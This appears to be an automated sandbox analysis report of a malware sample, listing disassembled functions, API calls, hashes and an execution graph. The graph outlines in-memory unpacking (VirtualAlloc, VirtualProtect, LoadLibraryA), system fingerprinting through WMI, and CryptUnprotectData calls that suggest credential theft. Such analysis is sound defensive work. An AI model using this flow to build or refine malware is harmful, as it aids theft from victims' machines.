                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                            • String ID:
                                                                            • API String ID: 1964976909-0
                                                                            • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                            • Instruction ID: 915c16980dbae73384928a8329aeacc40edbe5d8c4d71fb6232d67e2a999a6b3
                                                                            • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                            • Instruction Fuzzy Hash: 6BE086381401196FDF10BF61CC08BBF376D7F00B45B500825FD19D20A0DB35D1148AA8
                                                                            APIs
                                                                            • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                            • GetLastError.KERNEL32 ref: 004126F5
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                            • String ID:
                                                                            • API String ID: 3103352999-0
                                                                            • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                            • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                            • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                            • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                            APIs
                                                                            • TlsAlloc.KERNEL32(?,021A0D90), ref: 021A294F
                                                                            • GetLastError.KERNEL32 ref: 021A295C
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A2972
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A2980
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                            • String ID:
                                                                            • API String ID: 3103352999-0
                                                                            • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                            • Instruction ID: bbe4d2ecf7889fedee6667eabc4e0646bd69e1c514a6365f59509b26cbac2f92
                                                                            • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                            • Instruction Fuzzy Hash: 19E0C2381401156B8B24BF749C48ABF32AC7A01F15BA00A25F865E20E0EB78D0084AA8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: s2C$s2C
                                                                            • API String ID: 0-1833909196
                                                                            • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                            • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                            • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                            • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                            APIs
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 021B895A
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 021B8A13
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 3480331319-1018135373
                                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                            • Instruction ID: f476950ea7ad5ac79f32c36a8e1c2669bcf10c740448633cc8d33274606f3d16
                                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                            • Instruction Fuzzy Hash: 6A410830A40209DFCF11DF68C884ADEBBB9BF89728F158165E9159B391C736DA05CF91
                                                                            APIs
                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 0-711371036
                                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                            • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                            • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                            APIs
                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,021CB31B,?,00000050,?,?,?,?,?), ref: 021CB19B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 0-711371036
                                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                            • Instruction ID: dadba1f1af85e55237add5b207b2159d53bdcf987262cde9aaf2138a2a5f9e2b
                                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                            • Instruction Fuzzy Hash: C021796ABC8105A6EB248F54ED037977396EB64B6DF76842CE909D7300F732DB40C694
                                                                            APIs
                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: EncodersGdipImage$Size
                                                                            • String ID: image/png
                                                                            • API String ID: 864223233-2966254431
                                                                            • Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                            • Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
                                                                            • Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                            • Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: <(@
                                                                            • API String ID: 1452528299-4189137628
                                                                            • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                            • Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
                                                                            • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                            • Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5
                                                                            APIs
                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ___std_exception_destroy
                                                                            • String ID: <(@$ios_base::failbit set
                                                                            • API String ID: 4194217158-2207043977
                                                                            • Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                            • Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
                                                                            • Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                            • Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC
                                                                            APIs
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                            • String ID: pContext
                                                                            • API String ID: 1687795959-2046700901
                                                                            • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                            • Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
                                                                            • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                            • Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3_catch
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 3886170330-2084237596
                                                                            • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                            • Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
                                                                            • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                            • Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA
                                                                            APIs
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
                                                                              • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
                                                                              • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
                                                                              • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
                                                                              • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                            • String ID: F@
                                                                            • API String ID: 2118720939-885931407
                                                                            • Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                            • Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
                                                                            • Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                            • Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C
                                                                            APIs
                                                                            • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A
                                                                              • Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D
                                                                            Strings
                                                                            • Access violation - no RTTI data!, xrefs: 00428D6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                            • String ID: Access violation - no RTTI data!
                                                                            • API String ID: 2053020834-2158758863
                                                                            • Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                            • Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
                                                                            • Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                            • Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D
                                                                            APIs
                                                                            • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                            • String ID: jB$nB
                                                                            • API String ID: 3275300208-1818383504
                                                                            • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                            • Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
                                                                            • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                            • Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC
                                                                            APIs
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                            • String ID: pThreadProxy
                                                                            • API String ID: 1687795959-3651400591
                                                                            • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                            • Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
                                                                            • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                            • Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CommandLine
                                                                            • String ID: &o
                                                                            • API String ID: 3253501508-4209142641
                                                                            • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                            • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                            • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                            • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
                                                                            • GetLastError.KERNEL32 ref: 0042AF1E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1717984340-0
                                                                            • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                            • Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
                                                                            • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                            • Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02192AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02192AA3,00000000), ref: 021BB177
                                                                            • GetLastError.KERNEL32 ref: 021BB185
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02192AA3,00000000), ref: 021BB1E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1717984340-0
                                                                            • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                            • Instruction ID: 75213fb2d7cf45f4b0a0ade5a1b276a238667089472a386434f5f3405b70b9a8
                                                                            • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                            • Instruction Fuzzy Hash: 03412831A48206AFCF279F64D8447FE7BB5EF01329F1541A8ED59AB5A0DB30AB01CB50

                                                                            Execution Graph

                                                                            Execution Coverage:2.9%
                                                                            Dynamic/Decrypted Code Coverage:20.8%
                                                                            Signature Coverage:41.6%
                                                                            Total number of Nodes:154
                                                                            Total number of Limit Nodes:12
                                                                            execution_graph 26385 408880 26387 40888f 26385->26387 26386 408ab5 ExitProcess 26387->26386 26388 4088a4 GetCurrentProcessId GetCurrentThreadId 26387->26388 26394 408a99 26387->26394 26389 4088ca 26388->26389 26390 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26388->26390 26389->26390 26391 408974 26390->26391 26395 43eb20 26391->26395 26393 4089cf 26393->26394 26394->26386 26394->26393 26398 441850 26395->26398 26397 43eb2a RtlAllocateHeap 26397->26393 26399 441870 26398->26399 26399->26397 26399->26399 26439 415720 26440 415740 26439->26440 26440->26440 26478 443190 26440->26478 26442 415882 26443 4158ab 26442->26443 26447 415ad2 26442->26447 26449 415b37 26442->26449 26452 4158ea 26442->26452 26486 443440 LdrInitializeThunk 26442->26486 26443->26447 26443->26449 26443->26452 26487 4434d0 26443->26487 26447->26452 26493 4402c0 LdrInitializeThunk 26447->26493 26449->26449 26450 443190 LdrInitializeThunk 26449->26450 26451 415c8d 26450->26451 26451->26452 26453 415d02 26451->26453 26456 415d3e 26451->26456 26494 443440 LdrInitializeThunk 26451->26494 26452->26452 26453->26456 26457 4434d0 LdrInitializeThunk 26453->26457 26454 415dbe 26459 416087 26454->26459 26465 41605d CryptUnprotectData 26454->26465 26456->26454 26495 4402c0 LdrInitializeThunk 26456->26495 26457->26456 26460 416498 26459->26460 26461 41647e 26459->26461 26463 41632f 26459->26463 26497 419840 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26461->26497 26463->26460 26464 4163b2 26463->26464 26476 4164c2 26463->26476 26496 41bba0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26464->26496 26465->26459 26465->26463 26467 416483 26467->26460 26475 41687e 26467->26475 26499 4402c0 LdrInitializeThunk 26467->26499 26469 41672c 26498 41bba0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26469->26498 26471 4168b7 26474 416bd9 26471->26474 26501 4402c0 LdrInitializeThunk 26471->26501 26475->26471 26475->26474 26500 4402c0 LdrInitializeThunk 26475->26500 26476->26452 26476->26469 26482 4432f0 26476->26482 26480 4431b0 26478->26480 26479 443298 26479->26442 26480->26479 26502 4402c0 LdrInitializeThunk 26480->26502 26483 443310 26482->26483 26484 4433ee 26483->26484 26503 4402c0 LdrInitializeThunk 26483->26503 26484->26476 26486->26443 26488 4158db 26487->26488 26489 4434e9 26487->26489 26488->26447 26488->26449 26488->26452 26489->26488 26504 4402c0 LdrInitializeThunk 26489->26504 26491 443538 26491->26488 26505 4402c0 LdrInitializeThunk 26491->26505 26493->26452 26494->26453 26495->26454 26496->26452 26497->26467 26498->26452 26499->26475 26500->26471 26501->26471 26502->26479 26503->26484 26504->26491 26505->26488 26400 43eb40 26401 43eb53 26400->26401 26402 43eb55 26400->26402 26403 43eb5a RtlFreeHeap 26402->26403 26506 40cfec 26507 40d010 26506->26507 26510 43b870 26507->26510 26509 40d175 26511 43b8b0 26510->26511 26511->26511 26512 43bc86 CoCreateInstance 26511->26512 26513 43c217 26512->26513 26514 43bcda SysAllocString 26512->26514 26515 43c227 GetVolumeInformationW 26513->26515 26518 43bd6a 26514->26518 26517 43c249 26515->26517 26517->26509 26519 43bd72 CoSetProxyBlanket 26518->26519 26520 43c206 SysFreeString 26518->26520 26521 43bd92 SysAllocString 26519->26521 26522 43c1fc 26519->26522 26520->26513 26524 43be80 26521->26524 26522->26520 26524->26524 26525 43becf SysAllocString 26524->26525 26527 43bef2 26525->26527 26526 43c1e7 SysFreeString SysFreeString 26526->26522 26527->26526 26528 43c1dd 26527->26528 26529 43bf39 VariantInit 26527->26529 26528->26526 26531 43bf90 26529->26531 26530 43c1cc VariantClear 26530->26528 26531->26530 26532 4406eb 26533 44070c 26532->26533 26535 44072e 26532->26535 26533->26535 26536 4402c0 LdrInitializeThunk 26533->26536 26536->26535 26537 750005 26542 75092b GetPEB 26537->26542 26539 750030 26543 75003c 26539->26543 26542->26539 26544 750049 26543->26544 26558 750e0f SetErrorMode SetErrorMode 26544->26558 26549 750265 26550 7502ce VirtualProtect 26549->26550 26552 75030b 26550->26552 26551 750439 VirtualFree 26555 7505f4 LoadLibraryA 26551->26555 26557 7504be 26551->26557 26552->26551 26553 7504e3 LoadLibraryA 26553->26557 26556 7508c7 26555->26556 26557->26553 26557->26555 26559 750223 26558->26559 26560 750d90 26559->26560 26561 750dad 26560->26561 26562 750dbb GetPEB 26561->26562 26563 750238 VirtualAlloc 26561->26563 26562->26563 26563->26549 26404 40ab12 26405 40ab22 26404->26405 26406 40ab3d WSAStartup 26405->26406 26407 40df92 CoInitializeSecurity 26564 421370 26565 4213d8 26564->26565 26566 42137e 26564->26566 26570 421490 26566->26570 26571 4214a0 26570->26571 26571->26571 26572 4432f0 LdrInitializeThunk 26571->26572 26573 42157f 26572->26573 26408 40e3d3 CoInitializeEx CoInitializeEx 26409 442390 26411 4423b0 26409->26411 26410 442439 26411->26410 26413 4402c0 LdrInitializeThunk 26411->26413 26413->26410 26414 540000 26417 540006 26414->26417 26418 540015 26417->26418 26421 5407a6 26418->26421 26426 5407c1 26421->26426 26422 5407ca CreateToolhelp32Snapshot 26423 5407e6 Module32First 26422->26423 26422->26426 26424 5407f5 26423->26424 26427 540005 26423->26427 26428 540465 26424->26428 26426->26422 26426->26423 26429 540490 26428->26429 26430 5404a1 VirtualAlloc 26429->26430 26431 5404d9 26429->26431 26430->26431 26431->26431 26574 4404b1 GetForegroundWindow 26575 4404ce 26574->26575 26432 440cde 26433 440ce8 26432->26433 26435 440dae 26433->26435 26438 4402c0 LdrInitializeThunk 26433->26438 26437 4402c0 LdrInitializeThunk 26435->26437 26437->26435 26438->26435 26581 4409b8 26582 4409d0 26581->26582 26583 440a3e 26582->26583 26587 4402c0 LdrInitializeThunk 26582->26587 26585 440a8e 26583->26585 26588 4402c0 LdrInitializeThunk 26583->26588 26585->26585 26587->26583 26588->26585

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 43b870-43b8af 1 43b8b0-43b95c 0->1 1->1 2 43b962-43b97f 1->2 3 43b980-43b9a4 2->3 3->3 4 43b9a6-43b9ef 3->4 5 43b9f0-43ba04 4->5 5->5 6 43ba06-43ba28 5->6 8 43bb5b-43bb6f 6->8 9 43ba2e-43ba46 6->9 10 43bb70-43bb8a 8->10 11 43ba50-43bae4 9->11 10->10 12 43bb8c-43bbef 10->12 11->11 13 43baea-43bb0f 11->13 15 43bbf0-43bc11 12->15 14 43bb10-43bb3e 13->14 14->14 16 43bb40-43bb57 14->16 15->15 17 43bc13-43bc6f 15->17 16->8 18 43bc70-43bc84 17->18 18->18 19 43bc86-43bcd4 CoCreateInstance 18->19 20 43c217-43c247 call 441c40 GetVolumeInformationW 19->20 21 43bcda-43bd1f 19->21 26 43c251-43c253 20->26 27 43c249-43c24d 20->27 23 43bd20-43bd3f 21->23 23->23 25 43bd41-43bd6c SysAllocString 23->25 32 43bd72-43bd8c CoSetProxyBlanket 25->32 33 43c206-43c213 SysFreeString 25->33 28 43c26d-43c274 26->28 27->26 30 43c276-43c27d 28->30 31 43c28d-43c2af 28->31 30->31 34 43c27f-43c28b 30->34 35 43c2b0-43c2c4 31->35 36 43bd92-43bdb2 32->36 37 43c1fc-43c202 32->37 33->20 34->31 35->35 39 43c2c6-43c309 35->39 38 43bdc0-43bde6 36->38 37->33 38->38 40 43bde8-43be72 SysAllocString 38->40 41 43c310-43c351 39->41 42 43be80-43becd 40->42 41->41 43 43c353-43c37f call 41dcb0 41->43 42->42 45 43becf-43bef7 SysAllocString 42->45 47 43c380-43c388 43->47 50 43c1e7-43c1f8 SysFreeString * 2 45->50 51 43befd-43bf1f 45->51 47->47 49 43c38a-43c38c 47->49 52 43c392-43c3a2 call 4081e0 49->52 53 43c260-43c267 49->53 50->37 58 43bf25-43bf28 51->58 59 43c1dd-43c1e3 51->59 